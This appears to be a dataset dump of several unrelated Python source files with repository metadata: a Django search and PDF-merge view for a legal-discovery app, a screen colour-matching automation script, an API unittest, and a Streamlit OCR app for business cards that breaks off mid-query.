no_options_wordlist.filter(modification_date=word) | no_options_wordlist.filter(record_link__name__icontains=word) | no_options_wordlist.filter(filename__icontains=word) '''\n\n #When there are Search Options (Amount,etc)\n \n else:\n \n final_list=temp_list\n \n \n if isJobdirectory:\n \n if word_job_directory.startswith('\"') and word_job_directory.endswith('\"'):\n \n word_job_directory = word_job_directory.replace('\"', '')\n helper_list = final_list.filter(job_directory__iexact=word_job_directory)\n word_job_directory = '\"'+word_job_directory+'\"'\n \n else:\n \n helper_list = final_list.filter(job_directory__icontains=word_job_directory)\n \n \n final_list = helper_list\n \n \n if isDocname:\n \n if word_docname.startswith('\"') and word_docname.endswith('\"'):\n \n word_docname = word_docname.replace('\"', '')\n helper_list = final_list.filter(filename__iexact=word_docname)\n word_docname = '\"'+word_docname+'\"'\n \n else:\n \n helper_list = final_list.filter(filename__icontains=word_docname)\n \n final_list = helper_list\n\n if isDoctype:\n \n doctype = SourceDocType.objects.filter(pretty_name__iexact=word_doctype)|SourceDocType.objects.filter(name__iexact=word_doctype.lower())\n doctype = doctype.distinct()\n \n if len(doctype) == 1:\n \n helper_list = final_list.filter(modified_document_type = doctype[0])\n final_list = helper_list\n \n if isMultipartfilename:\n \n if word_multipart_filename.startswith('\"') and word_multipart_filename.endswith('\"'):\n \n word_multipart_filename = word_multipart_filename.replace('\"', '')\n helper_list = final_list.filter(multipart_filename__iexact=word_multipart_filename)\n word_multipart_filename = '\"'+word_multipart_filename+'\"'\n \n else:\n \n helper_list = final_list.filter(multipart_filename__icontains=word_multipart_filename)\n \n final_list = helper_list\n \n if isIdDocname:\n \n separated_string = word_id_docname.split('.', 1)\n \n if len(separated_string) == 2:\n helper_list = final_list.filter(pk=separated_string[0],filename=separated_string[1])\n final_list = helper_list\n \n else:\n final_list = PdfRecord.objects.none()\n \n \n records_list = final_list \n \n total_records = records_list.count()\n \n if max_num > total_records:\n \n max_num = total_records\n \n if actual_min_num > max_num and max_num != 0:\n \n actual_min_num = max_num\n \n if records_list:\n \n #Sort by Categories depending on the user's input in the Search Tool:\n \n \n category_fields_order_list = category_fields_order_list.split(',')\n \n category_temp_list = filter(bool, category_fields_order_list)\n \n \n if len(category_temp_list):\n \n for item in category_temp_list:\n if len(item):\n \n records_list = records_list.order_by(item)\n \n \n else:\n records_list = records_list.order_by('pk')\n \n \n category_fields_order_list = \",\".join(category_temp_list)\n \n merging_records = records_list\n records_list = records_list[actual_min_num-1:max_num]\n \n # If button \"Assign To Group from Search Results\" is pressed by the superuser or TeamLeader, there is access to this block,\n # which creates a SourcePdfToHandle for the SourcePdf that resulted from the Search, and assigns it to the company of that user.\n \n if (user_type == \"superuser\" or user_type == \"TeamLeader\") and assign_search_results !=\"none\":\n \n\n user_group = the_user.groups.all().exclude(name=\"TeamLeaders\").exclude(name=\"Auditors\").exclude(name=\"TeamAuditors\").exclude(name=\"Arabic\")[0]\n none_user = User.objects.get(username=\"None\")\n \n if len(merging_records):\n \n with transaction.commit_on_success():\n for source in merging_records:\n \n already_assigned = source.assigndata.all()\n \n if len(already_assigned) == 0:\n \n memo_report = \"Pressed Assign To Group from Search Results in Search Tool. Assigned to Group: \"+user_group.name+\". This being PK.\"+str(source.pk)+\". It was previously unassigned. Type was: \"+source.modified_document_type.name\n \n report = Report(report_type=\"Search Tool\",report_subtype=\"search_tool_assign_search_results\",report_author=the_user,report_company=user_group,report_date=datetime.datetime.now().replace(tzinfo=timezone.utc),report_memo = memo_report)\n report.save()\n \n tohandle = SourcePdfToHandle(assignedcompany=user_group,assigneduser=none_user,lot_number=-1)\n tohandle.save()\n source.assigndata.add(tohandle)\n source.save()\n \n \n \n \n elif corpus_word==\"corpus_ocr_records\":\n \n #Filters block\n \n \n if filter_word==\"pdf_error\":\n \n records_list = PdfRecord.objects.filter(commentary__contains=\"Error detected\")\n \n elif filter_word==\"pdf_linked\":\n \n records_list = PdfRecord.objects.filter(status=\"pdf_linked\")\n \n elif filter_word==\"pdf_unlinked\":\n \n records_list = PdfRecord.objects.filter(status=\"pdf_unlinked\")\n \n else:\n \n filter_word=\"pdf_all\"\n records_list = PdfRecord.objects.all()\n\n #Making lists to use in the Search of Coincidences\n \n temp_list = records_list\n final_list = PdfRecord.objects.none()\n \n \n #Check which Search Options are covered\n \n\n if len(word_amount) != 0:\n isAmount = True\n \n else:\n isAmount = False\n \n\n if len(word_companyname) != 0:\n isCompanyname = True\n \n else:\n isCompanyname = False\n \n \n if len(word_date) != 0:\n isDate = True\n \n else:\n isDate = False\n \n if len(word_doctype) != 0:\n isDoctype = True\n \n else:\n isDoctype = False\n \n if len(word_piecenumber) != 0:\n isPiecenumber = True\n \n else:\n isPiecenumber = False\n \n if len(word_docname) != 0:\n isDocname = True\n \n else:\n isDocname = False\n \n if len(word_id_docname) != 0:\n isIdDocname = True\n \n else:\n isIdDocname = False\n \n\n #When at least a word is being searched and there are no Search Options\n \n if word ==\"all\" and isAmount == False and isCompanyname == False and isDate == False and isDoctype == False and isPiecenumber == False and isDocname == False and isIdDocname == False:\n \n #helper_list = temp_list.filter(ocrrecord_link__Company__icontains=word) | temp_list.filter(ocrrecord_link__Amount__icontains=word) | temp_list.filter(ocrrecord_link__IssueDate__icontains=word)\n\n final_list = records_list\n \n # Unused filters:\n '''no_options_wordlist.filter(sourcedoc_link__filename__icontains=word)| no_options_wordlist.filter(modification_date=word) | no_options_wordlist.filter(record_link__name__icontains=word) | no_options_wordlist.filter(filename__icontains=word) '''\n\n #When there are Search Options (Amount,etc)\n \n else:\n \n final_list=temp_list\n \n \n if isAmount:\n \n if word_amount.startswith('\"') and word_amount.endswith('\"'):\n \n word_amount = word_amount.replace('\"', '')\n helper_list = final_list.filter(ocrrecord_link__Amount__exact=word_amount)\n word_amount = '\"'+word_amount+'\"'\n \n else:\n \n helper_list = final_list.filter(ocrrecord_link__Amount__icontains=word_amount)\n \n \n final_list = helper_list\n \n \n \n if isCompanyname:\n \n if word_companyname.startswith('\"') and word_companyname.endswith('\"'):\n \n word_companyname = word_companyname.replace('\"', '')\n helper_list = final_list.filter(ocrrecord_link__Company__iexact=word_companyname)\n word_companyname = '\"'+word_companyname+'\"'\n else:\n \n helper_list = final_list.filter(ocrrecord_link__Company__icontains=word_companyname)\n \n final_list = helper_list\n \n \n if isDate:\n \n constructed_date = word_date.split(\"/\")\n \n helper_list = final_list\n\n if len(constructed_date) > 0:\n day = constructed_date[0]\n if day != \"XX\" and day !=\"NaN\" and day != \"?\":\n helper_list = helper_list.filter(ocrrecord_link__Day__exact=day)\n \n if len(constructed_date) > 1:\n month = constructed_date[1]\n if month != \"XX\" and month !=\"NaN\" and month != \"?\":\n helper_list = helper_list.filter(ocrrecord_link__Month__exact=month)\n \n if len(constructed_date) > 2:\n year = constructed_date[2]\n if year != \"XXXX\" and year !=\"NaN\" and year != \"?\":\n helper_list = helper_list.filter(ocrrecord_link__Year__exact=year)\n\n\n final_list = helper_list\n \n '''helper_list = final_list.filter(ocrrecord_link__IssueDate__icontains=word_date)\n final_list = helper_list'''\n \n if isDoctype:\n \n doctype = SourceDocType.objects.filter(pretty_name__iexact=word_doctype)|SourceDocType.objects.filter(name__iexact=word_doctype.lower())\n doctype = doctype.distinct()\n \n if len(doctype) == 1:\n \n helper_list = final_list.filter(modified_document_type = doctype[0])\n final_list = helper_list\n \n if isPiecenumber:\n \n if word_piecenumber.startswith('\"') and word_piecenumber.endswith('\"'):\n \n word_piecenumber = word_piecenumber.replace('\"', '')\n helper_list = final_list.filter(ocrrecord_link__Piece_Number__iexact=word_piecenumber)\n word_piecenumber = '\"'+word_piecenumber+'\"'\n else:\n \n helper_list = final_list.filter(ocrrecord_link__Piece_Number__icontains=word_piecenumber)\n \n \n final_list = helper_list\n \n if isDocname:\n \n if word_docname.startswith('\"') and word_docname.endswith('\"'):\n \n word_docname = word_docname.replace('\"', '')\n helper_list = final_list.filter(sourcedoc_link__filename__iexact=word_docname)\n word_docname = '\"'+word_docname+'\"'\n \n else:\n \n helper_list = final_list.filter(sourcedoc_link__filename__icontains=word_docname)\n \n final_list = helper_list\n\n if isIdDocname:\n \n separated_string = word_id_docname.split('.', 1)\n \n if len(separated_string) == 2:\n helper_list = final_list.filter(pk=separated_string[0],sourcedoc_link__filename=separated_string[1])\n final_list = helper_list\n \n else:\n final_list = PdfRecord.objects.none()\n \n \n \n records_list = final_list \n\n total_records = records_list.count()\n \n if max_num > total_records:\n \n max_num = total_records\n \n if actual_min_num > max_num and max_num != 0:\n \n actual_min_num = max_num\n \n if records_list:\n \n #Sort by Categories depending on the user's input in the Search Tool:\n \n \n category_fields_order_list = category_fields_order_list.split(',')\n \n category_temp_list = filter(bool, category_fields_order_list)\n \n \n if len(category_temp_list):\n \n for item in category_temp_list:\n if len(item):\n \n records_list = records_list.order_by(item)\n \n \n else:\n records_list = records_list.order_by('pk')\n \n \n category_fields_order_list = \",\".join(category_temp_list)\n \n merging_records = records_list\n records_list = records_list[actual_min_num-1:max_num]\n \n \n elif corpus_word==\"corpus_internal_records\":\n \n \n #Filters block\n \n \n if filter_word==\"pdf_error\":\n \n records_list = Record.objects.filter(commentary__contains=\"Error detected\")\n \n elif filter_word==\"pdf_linked\":\n \n records_list = Record.objects.filter(status=\"linked\")\n \n elif filter_word==\"pdf_unlinked\":\n \n records_list = Record.objects.filter(status=\"unlinked\")\n \n else:\n \n filter_word=\"pdf_all\"\n records_list = Record.objects.all()\n\n #Making lists to use in the Search of Coincidences\n \n temp_list = records_list\n final_list = Record.objects.none()\n \n \n #Check which Search Options are covered\n \n if len(word_amount_credit) != 0:\n isAmountcredit = True\n \n else:\n isAmountcredit = False\n \n if len(word_amount_debit) != 0:\n isAmountdebit = True\n \n else:\n isAmountdebit = False\n\n if len(word_companyname) != 0:\n isCompanyname = True\n \n else:\n isCompanyname = False\n \n \n if len(word_date) != 0:\n isDate = True\n \n else:\n isDate = False\n \n\n if len(word_piecenumber) != 0:\n isPiecenumber = True\n \n else:\n isPiecenumber = False\n \n if len(word_accountnumber) != 0:\n isAccountnumber = True\n \n else:\n isAccountnumber = False\n \n if len(word_movnumber) != 0:\n isMovementnumber = True\n \n else:\n isMovementnumber = False\n \n if len(word_journal) != 0:\n isJournal = True\n \n else:\n isJournal = False\n \n if len(word_s) != 0:\n isS = True\n \n else:\n isS = False\n \n if len(word_lett) != 0:\n isLett = True\n \n else:\n isLett = False\n \n if len(word_docname) != 0:\n isDocname = True\n \n else:\n isDocname = False\n \n if len(word_id) != 0:\n isId = True\n \n else:\n isId = False\n \n\n #When at least a word is being searched and there are no Search Options\n \n if word ==\"all\" and isAmountcredit == False and isAmountdebit == False and isCompanyname == False and isDate == False and isPiecenumber == False and isAccountnumber == False and isMovementnumber == False and isJournal == False and isS == False and isLett == False and isId == False:\n \n #helper_list = temp_list.filter(ocrrecord_link__Company__icontains=word) | temp_list.filter(ocrrecord_link__Amount__icontains=word) | temp_list.filter(ocrrecord_link__IssueDate__icontains=word)\n\n final_list = records_list\n \n # Unused filters:\n '''no_options_wordlist.filter(sourcedoc_link__filename__icontains=word)| no_options_wordlist.filter(modification_date=word) | no_options_wordlist.filter(record_link__name__icontains=word) | no_options_wordlist.filter(filename__icontains=word) '''\n\n #When there are Search Options (Amount,etc)\n \n else:\n \n final_list=temp_list\n \n \n if isAmountcredit:\n \n if word_amount_credit.startswith('\"') and word_amount_credit.endswith('\"'):\n \n word_amount_credit = word_amount_credit.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Credit__exact=word_amount_credit)\n word_amount_credit = '\"'+word_amount_credit+'\"'\n \n else:\n \n helper_list = final_list.filter(internalrecord_link__Credit__icontains=word_amount_credit)\n \n \n final_list = helper_list\n \n if isAmountdebit:\n \n if word_amount_debit.startswith('\"') and word_amount_debit.endswith('\"'):\n \n word_amount_debit = word_amount_debit.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Debit__exact=word_amount_debit)\n word_amount_debit = '\"'+word_amount_debit+'\"'\n \n else:\n \n helper_list = final_list.filter(internalrecord_link__Debit__icontains=word_amount_debit)\n \n \n final_list = helper_list\n \n if isCompanyname:\n \n if word_companyname.startswith('\"') and word_companyname.endswith('\"'):\n \n word_companyname = word_companyname.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Company__iexact=word_companyname)\n word_companyname = '\"'+word_companyname+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__Company__icontains=word_companyname)\n \n final_list = helper_list\n \n \n if isDate:\n \n constructed_date = word_date.split(\"/\")\n \n helper_list = final_list\n\n if len(constructed_date) > 0:\n day = constructed_date[0]\n if day != \"XX\" and day !=\"NaN\" and day != \"?\":\n helper_list = helper_list.filter(internalrecord_link__Day__exact=day)\n \n if len(constructed_date) > 1:\n month = constructed_date[1]\n if month != \"XX\" and month !=\"NaN\" and month != \"?\":\n helper_list = helper_list.filter(internalrecord_link__Month__exact=month)\n \n if len(constructed_date) > 2:\n year = constructed_date[2]\n if year != \"XXXX\" and year !=\"NaN\" and year != \"?\":\n helper_list = helper_list.filter(internalrecord_link__Year__exact=year)\n\n\n final_list = helper_list\n \n \n if isPiecenumber:\n \n if word_piecenumber.startswith('\"') and word_piecenumber.endswith('\"'):\n \n word_piecenumber = word_piecenumber.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__NoPiece__iexact=word_piecenumber)\n word_piecenumber = '\"'+word_piecenumber+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__NoPiece__icontains=word_piecenumber)\n \n \n final_list = helper_list\n \n if isAccountnumber:\n \n if word_accountnumber.startswith('\"') and word_accountnumber.endswith('\"'):\n \n word_accountnumber = word_accountnumber.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__AccountNum__iexact=word_accountnumber)\n word_accountnumber = '\"'+word_accountnumber+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__AccountNum__icontains=word_accountnumber)\n \n \n final_list = helper_list\n \n if isMovementnumber:\n \n if word_movnumber.startswith('\"') and word_movnumber.endswith('\"'):\n \n word_movnumber = word_movnumber.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__NoMvt__iexact=word_movnumber)\n word_movnumber = '\"'+word_movnumber+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__NoMvt__icontains=word_movnumber)\n \n \n final_list = helper_list\n \n if isJournal:\n \n if word_journal.startswith('\"') and word_journal.endswith('\"'):\n \n word_journal = word_journal.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Journal__iexact=word_journal)\n word_journal = '\"'+word_journal+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__Journal__icontains=word_journal)\n \n \n final_list = helper_list\n\n if isS:\n \n if word_s.startswith('\"') and word_s.endswith('\"'):\n \n word_s = word_s.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__S__iexact=word_s)\n word_s = '\"'+word_s+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__S__icontains=word_s)\n \n \n final_list = helper_list\n \n if isLett:\n \n if word_lett.startswith('\"') and word_lett.endswith('\"'):\n \n word_lett = word_lett.replace('\"', '')\n helper_list = final_list.filter(internalrecord_link__Lett__iexact=word_lett)\n word_lett = '\"'+word_lett+'\"'\n else:\n \n helper_list = final_list.filter(internalrecord_link__Lett__icontains=word_lett)\n \n \n final_list = helper_list\n \n if isId:\n \n\n if len(word_id) > 0:\n helper_list = final_list.filter(pk=word_id)\n final_list = helper_list\n \n else:\n final_list = PdfRecord.objects.none()\n \n \n records_list = final_list \n \n total_records = records_list.count()\n \n if max_num > total_records:\n \n max_num = total_records\n \n if actual_min_num > max_num and max_num != 0:\n \n actual_min_num = max_num\n \n if records_list:\n \n #Sort by Categories depending on the user's input in the Search Tool:\n \n \n category_fields_order_list = category_fields_order_list.split(',')\n \n category_temp_list = filter(bool, category_fields_order_list)\n \n \n if len(category_temp_list):\n \n for item in category_temp_list:\n if len(item):\n \n records_list = records_list.order_by(item)\n \n \n else:\n records_list = records_list.order_by('pk')\n \n \n category_fields_order_list = \",\".join(category_temp_list)\n \n \n merging_records = records_list\n records_list = records_list[actual_min_num-1:max_num]\n \n ##### COMMON BLOCK ####\n \n \n \n try:\n export_mark = request.POST['export_mark']\n except (KeyError):\n \n export_mark = \"none\"\n \n #if export_mark == \"export_mark\":\n \n \n if export_mark == \"export_mark\" and corpus_word!=\"corpus_internal_records\":\n \n if len(merging_records) > 10:\n \n merging_records = merging_records[:10]\n\n response = HttpResponse(mimetype=\"application/pdf\")\n response['Content-Disposition'] = 'attachment; filename=output_document.pdf'\n output = PdfFileWriter()\n \n with transaction.commit_on_success():\n for record in merging_records:\n \n if corpus_word==\"corpus_source_records\":\n \n source_url = \"http://54.200.180.182/sourcepdfs/%s/%s\" %(record.job_directory, record.filename)\n \n if corpus_word==\"corpus_ocr_records\":\n \n source_url = \"http://54.200.180.182/sourcepdfs/%s/%s\" %(record.sourcedoc_link.job_directory, record.sourcedoc_link.filename)\n\n remoteFile = urlopen(Request(source_url)).read()\n memoryFile = StringIO(remoteFile)\n input_pdf = PdfFileReader(memoryFile)\n \n output.addPage(input_pdf.getPage(0))\n \n \n outputStream = StringIO()\n output.write(outputStream)\n response.write(outputStream.getvalue())\n return response\n \n \n showing_records = records_list.count()\n \n\n page_counter_end = actual_min_num + showing_records - 1\n \n plus_limit = total_records-50\n \n if showing_records == 0:\n \n actual_min_num = 0\n max_num = 0 \n page_counter_end = 0\n \n \n \n context = {'user_type':user_type,\n 'records_list':records_list,'types_list':types_list,'companyname_list':companyname_list,'corpus_word':corpus_word,'filter_word': filter_word,\n 'word_amount':word_amount,'word_companyname':word_companyname,'word_amount_credit':word_amount_credit,'word_amount_debit':word_amount_debit,\n 'word_date':word_date,'word_doctype':word_doctype,'word_piecenumber':word_piecenumber,'word_accountnumber':word_accountnumber,\n 'word_movnumber':word_movnumber,'word_journal':word_journal,'word_s':word_s,'word_lett':word_lett,'word_id':word_id,\n 'word_job_directory':word_job_directory,'word_multipart_filename':word_multipart_filename,\n 'word_docname':word_docname,'word_id_docname':word_id_docname,'total_records':total_records,\n 'page_counter_beginning':actual_min_num,'page_counter_end':page_counter_end,'plus_limit':plus_limit,\n 'category_fields_order_list':category_fields_order_list,'the_user':the_user}\n \n return render(request,'enersectapp/search_tool.html',context)", "repo_name": "HinWise/LegalDiscovery", "sub_path": "enersectapp/viewsfunctions/search_tool_module.py", "file_name": "search_tool_module.py", "file_ext": "py", "file_size_in_byte": 39603, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.http.HttpResponseRedirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 502, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 502, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 511, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 511, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.utc", "line_number": 511, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 511, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 1112, "usage_type": "call"}, {"api_name": "pyPdf.PdfFileWriter", "line_number": 1114, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 1116, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 1116, "usage_type": "name"}, {"api_name": "urllib2.urlopen", "line_number": 1127, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 1127, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 1128, "usage_type": "call"}, {"api_name": "pyPdf.PdfFileReader", "line_number": 1129, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 1134, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 1165, "usage_type": "call"}]}
+{"seq_id": "18138544155", "text": "import win32com.client\nimport pyautogui as pag\n\ndm = win32com.client.Dispatch('dm.dmsoft')\n\nx, y = pag.position()\npos = [x - 50, y - 50, 100, 100]\n# dm_ret = dm.Capture(x-50,y-50,x+50,y+50,\"screen.bmp\")\n# print(dm_ret)\n\na,b = 0,0\ndm_ret = dm.FindMulColor(x-50,y-50,x+50,y+50,\"feda25\",0.9)\nprint(dm_ret)\nif a>0 or b>0:\n print(\"找到\")\n\ndm_ret = dm.FindPic(x-50,y-50,x+50,y+50,\"E:\\python_workplace\\yundinghuanwei/feature.bmp\",\"202020\",0.5,0,a,b)\n# print(dm_ret)\n\nif a>0 or b>0:\n print(\"找到\")", "repo_name": "adzcsx2/lol_Teamfight_change_position_quick", "sub_path": "dmtest.py", "file_name": "dmtest.py", "file_ext": "py", "file_size_in_byte": 499, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "win32com.client.client.Dispatch", "line_number": 4, "usage_type": "call"}, {"api_name": "win32com.client.client", "line_number": 4, "usage_type": "attribute"}, {"api_name": "win32com.client", "line_number": 4, "usage_type": "name"}, {"api_name": "pyautogui.position", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "25965379005", "text": "#coding=utf-8\nimport unittest\nimport requests\nimport logging\n\nclass getWeather(unittest.TestCase):\n\n def setUp(self):\n self.url='http://www.sojson.com/open/api/weather/json.shtml'\n self.headers = {\"Content-Type\": \"application/json\"}\n self.data = {\n \"channel\": \"CHN_D00000\",\n \"transType\": \"REDEEM\",\n \"flowId\": \"213245678901234567890\",\n \"clientId\": \"CHN_TRANSFORMER\",\n \"transDatetime\": 11111\n }\n\n def test_beijng(self):\n response = requests.post(url=self.url, json=self.data, headers=self.headers)\n result=response.json()\n print(result)\n #logging.log()\n self.assertEqual(result['status'],200)\n self.assertEqual(result['message'], 'Success !')\n\nif __name__ == \"__main__\":\n suit=unittest.TestSuite\n suit.addTests(getWeather('test_beijng'))\n runner=unittest.TextTestRunner()\n runner.run(suit)\n", "repo_name": "msy53719/interface-python-test", "sub_path": "httprequest/HttpTest_Post.py", "file_name": "HttpTest_Post.py", "file_ext": "py", "file_size_in_byte": 907, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 20, "usage_type": "call"}, {"api_name": "unittest.TestSuite", "line_number": 28, "usage_type": "attribute"}, {"api_name": "unittest.TextTestRunner", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "38031661836", "text": "# IMPORTING LIBRARIES\r\nimport streamlit as st \r\nimport mysql.connector\r\nimport pandas as pd\r\nimport cv2\r\nimport easyocr\r\nimport os \r\nimport re \r\nimport matplotlib.pyplot as plt \r\nimport base64 \r\n# SETTING PAGE CONFIGURATIONS\r\nst.set_page_config(page_title=\"BizCardX: Extracting Business Card Data with OCR\",\r\n layout=\"wide\",\r\n initial_sidebar_state=\"expanded\"\r\n )\r\nst.markdown(\"BizCardX: Extracting Business Card Data with OCR \", unsafe_allow_html=True)\r\ndef add_bg_from_local(image_file):\r\n with open(image_file, \"rb\") as image_file:\r\n encoded_string = base64.b64encode(image_file.read())\r\n st.markdown(\r\n f\"\"\"\r\n \r\n \"\"\",\r\n unsafe_allow_html=True\r\n )\r\nadd_bg_from_local('background.jpg') \r\n# CREATING TABS\r\ntab1, tab2, tab3 = st.tabs([\"🏠Home\",\"⬆️Update & Extract\",\"📝Modify\"])\r\n# INITIALIZING THE EasyOCR READER\r\nreader = easyocr.Reader(['en'])\r\n# CONNECTING WITH MYSQL DATABASE\r\nmydb = mysql.connector.connect(host=\"localhost\",\r\n user=\"root\",\r\n password=\"your_password\",\r\n database= \"your_database_name\"\r\n )\r\nmycursor = mydb.cursor(buffered=True)\r\n# TABLE CREATION\r\nmycursor.execute('''CREATE TABLE IF NOT EXISTS bizcard_data\r\n (id INTEGER PRIMARY KEY AUTO_INCREMENT,\r\n company_name TEXT,\r\n card_holder TEXT,\r\n designation TEXT,\r\n mobile_number VARCHAR(50),\r\n email TEXT,\r\n website TEXT,\r\n area TEXT,\r\n city TEXT,\r\n state TEXT,\r\n pin_code VARCHAR(10),\r\n image LONGBLOB\r\n )''')\r\n# HOME MENU\r\nwith tab1:\r\n st.markdown(\"## :[**TECHNOLOGIES USED :**] Python, easy OCR, Streamlit, SQL, Pandas\")\r\n st.markdown(\"## :[**OVERVIEW :**] • In this streamlit web app you can upload an image of a business card and extract relevant information from it using easyOCR.\")\r\n st.markdown(\"## • You can view, modify or delete the extracted data in this app.\")\r\n st.markdown(\"## • This app would also allow users to save the extracted information into a database along with the uploaded business card image.\")\r\n st.markdown(\"## • The database would be able to store multiple entries, each with its own business card image and extracted information.\")\r\n# UPLOAD AND EXTRACT MENU\r\nwith tab2:\r\n st.markdown(\"### Upload a Business Card\")\r\n uploaded_card = st.file_uploader(\"upload here\",label_visibility=\"collapsed\",type=[\"png\",\"jpeg\",\"jpg\"])\r\n \r\n if uploaded_card is not None:\r\n def save_card(uploaded_card):\r\n with open(os.path.join(\"uploaded_cards\",uploaded_card.name), \"wb\") as f:\r\n f.write(uploaded_card.getbuffer()) \r\n save_card(uploaded_card)\r\n\r\n def image_preview(image,res): \r\n for (bbox, text, prob) in res: \r\n # unpack the bounding box\r\n (tl, tr, br, bl) = bbox\r\n tl = (int(tl[0]), int(tl[1]))\r\n tr = (int(tr[0]), int(tr[1]))\r\n br = (int(br[0]), int(br[1]))\r\n bl = (int(bl[0]), int(bl[1]))\r\n cv2.rectangle(image, tl, br, (0, 255, 0), 2)\r\n cv2.putText(image, text, (tl[0], tl[1] - 10),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 0), 2)\r\n plt.rcParams['figure.figsize'] = (15,15)\r\n plt.axis('off')\r\n plt.imshow(image)\r\n # DISPLAYING THE UPLOADED CARD\r\n col1,col2 = st.columns(2,gap=\"large\")\r\n with col1:\r\n st.markdown(\"# \")\r\n st.markdown(\"# \")\r\n st.markdown(\"### You have uploaded the card\")\r\n st.image(uploaded_card)\r\n # DISPLAYING THE CARD WITH HIGHLIGHTS\r\n with col2:\r\n st.markdown(\"# \")\r\n st.markdown(\"# \")\r\n with st.spinner(\"Please wait processing image...\"):\r\n st.set_option('deprecation.showPyplotGlobalUse', False)\r\n saved_img = os.getcwd()+ \"\\\\\" + \"uploaded_cards\"+ \"\\\\\"+ uploaded_card.name\r\n image = cv2.imread(saved_img)\r\n res = reader.readtext(saved_img)\r\n st.markdown(\"### Image Processed and Data Extracted\")\r\n st.pyplot(image_preview(image,res))\r\n saved_img = os.getcwd()+ \"\\\\\" + \"uploaded_cards\"+ \"\\\\\"+ uploaded_card.name\r\n result = reader.readtext(saved_img,detail = 0,paragraph=False)\r\n # CONVERTING IMAGE TO BINARY TO UPLOAD TO SQL DATABASE\r\n def img_to_binary(file):\r\n with open(file, 'rb') as file:\r\n binaryData = file.read()\r\n return binaryData\r\n \r\n data = {\"company_name\" : [],\r\n \"card_holder\" : [],\r\n \"designation\" : [],\r\n \"mobile_number\" :[],\r\n \"email\" : [],\r\n \"website\" : [],\r\n \"area\" : [],\r\n \"city\" : [],\r\n \"state\" : [],\r\n \"pin_code\" : [],\r\n \"image\" : img_to_binary(saved_img)\r\n }\r\n\r\n def get_data(res):\r\n for ind,i in enumerate(res):\r\n\r\n # To get WEBSITE_URL\r\n if \"www \" in i.lower() or \"www.\" in i.lower():\r\n data[\"website\"].append(i)\r\n elif \"WWW\" in i:\r\n data[\"website\"] = res[4] +\".\" + res[5]\r\n\r\n # To get EMAIL ID\r\n elif \"@\" in i:\r\n data[\"email\"].append(i)\r\n\r\n # To get MOBILE NUMBER\r\n elif \"-\" in i:\r\n data[\"mobile_number\"].append(i)\r\n if len(data[\"mobile_number\"]) ==2:\r\n data[\"mobile_number\"] = \" & \".join(data[\"mobile_number\"])\r\n\r\n # To get COMPANY NAME \r\n elif ind == len(res)-1:\r\n data[\"company_name\"].append(i)\r\n\r\n # To get CARD HOLDER NAME\r\n elif ind == 0:\r\n data[\"card_holder\"].append(i)\r\n\r\n # To get DESIGNATION\r\n elif ind == 1:\r\n data[\"designation\"].append(i)\r\n\r\n # To get AREA\r\n if re.findall('^[0-9].+, [a-zA-Z]+',i):\r\n data[\"area\"].append(i.split(',')[0])\r\n elif re.findall('[0-9] [a-zA-Z]+',i):\r\n data[\"area\"].append(i)\r\n\r\n # To get CITY NAME\r\n match1 = re.findall('.+St , ([a-zA-Z]+).+', i)\r\n match2 = re.findall('.+St,, ([a-zA-Z]+).+', i)\r\n match3 = re.findall('^[E].*',i)\r\n if match1:\r\n data[\"city\"].append(match1[0])\r\n elif match2:\r\n data[\"city\"].append(match2[0])\r\n elif match3:\r\n data[\"city\"].append(match3[0])\r\n\r\n # To get STATE\r\n state_match = re.findall('[a-zA-Z]{9} +[0-9]',i)\r\n if state_match:\r\n data[\"state\"].append(i[:9])\r\n elif re.findall('^[0-9].+, ([a-zA-Z]+);',i):\r\n data[\"state\"].append(i.split()[-1])\r\n if len(data[\"state\"])== 2:\r\n data[\"state\"].pop(0)\r\n\r\n # To get PINCODE \r\n if len(i)>=6 and i.isdigit():\r\n data[\"pin_code\"].append(i)\r\n elif re.findall('[a-zA-Z]{9} +[0-9]',i):\r\n data[\"pin_code\"].append(i[10:])\r\n get_data(result)\r\n # FUNCTION TO CREATE DATAFRAME\r\n def create_df(data):\r\n df = pd.DataFrame(data)\r\n return df\r\n df = create_df(data)\r\n st.success(\"### Data Extracted!\")\r\n st.write(df)\r\n \r\n if st.button(\"Upload to Database\"):\r\n for i,row in df.iterrows():\r\n sql = \"\"\"INSERT INTO 